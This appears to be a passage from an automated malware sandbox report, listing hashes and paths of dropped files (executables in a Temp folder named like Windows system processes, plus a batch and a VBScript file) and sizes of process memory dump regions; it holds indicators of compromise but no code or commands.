SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\conhost.exeFilesize
63KB
MD5ec57b49d155e05d971f73e2eb3d3d01f
SHA1f8537e9b44342a71f1f8bf48548b27574f17ff7c
SHA256baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c
SHA512e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533
-
C:\Users\Admin\AppData\Local\Temp\wininit.exeFilesize
409KB
MD5301613f1fcda48ebade4c197175be1a0
SHA103f58ab72f3c2d991418861adfc9c3b3289640a0
SHA2561772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41
SHA512375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525
-
C:\Users\Admin\AppData\Roaming\Windows_Log_876.batFilesize
608KB
MD50598b47f8cba2aa8042d5241594a2a18
SHA12f9923a0cd52476a33e005156675c19d445a627f
SHA256edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e
SHA512146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1
-
C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbsFilesize
115B
MD5995831d3bba7837f1b3acc03ffe50c25
SHA14223009495a9b47c997162b78bff72c7f4323b57
SHA256465374b758b74b4f969922fa248fcd7d7b83ceade999a21f8c0dacc0787d43f7
SHA5128e12d3372570310e6e0a06d639bd12264efebce809f0f17d9c2ad5bb7a6c79775a975c871e2f8274b23033c3d680f314909cde1465a84b0f86a517d0d42606ed
-
memory/1248-50-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/1248-15-0x000001E19CE00000-0x000001E19CE08000-memory.dmpFilesize
32KB
-
memory/1248-11-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/1248-12-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/1248-13-0x000001E19F270000-0x000001E19F2B4000-memory.dmpFilesize
272KB
-
memory/1248-14-0x000001E19F340000-0x000001E19F3B6000-memory.dmpFilesize
472KB
-
memory/1248-6-0x000001E19CDB0000-0x000001E19CDD2000-memory.dmpFilesize
136KB
-
memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmpFilesize
728KB
-
memory/1248-0-0x00007FFA20523000-0x00007FFA20525000-memory.dmpFilesize
8KB
-
memory/2148-104-0x0000000001840000-0x0000000001850000-memory.dmpFilesize
64KB
-
memory/2148-102-0x0000000000F00000-0x0000000000F0E000-memory.dmpFilesize
56KB
-
memory/2196-108-0x0000000005430000-0x0000000005496000-memory.dmpFilesize
408KB
-
memory/2196-123-0x0000000006CC0000-0x0000000006CCA000-memory.dmpFilesize
40KB
-
memory/2196-106-0x0000000005380000-0x0000000005412000-memory.dmpFilesize
584KB
-
memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmpFilesize
432KB
-
memory/2196-109-0x0000000006090000-0x00000000060A2000-memory.dmpFilesize
72KB
-
memory/2196-110-0x00000000065D0000-0x000000000660C000-memory.dmpFilesize
240KB
-
memory/2196-105-0x00000000059E0000-0x0000000005F84000-memory.dmpFilesize
5.6MB
-
memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmpFilesize
104KB
-
memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmpFilesize
56KB
-
memory/4348-32-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/4348-29-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/4348-28-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/4348-18-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmpFilesize
10.8MB
-
memory/4536-97-0x0000000000120000-0x0000000000136000-memory.dmpFilesize
88KB
-
memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmpFilesize
96KB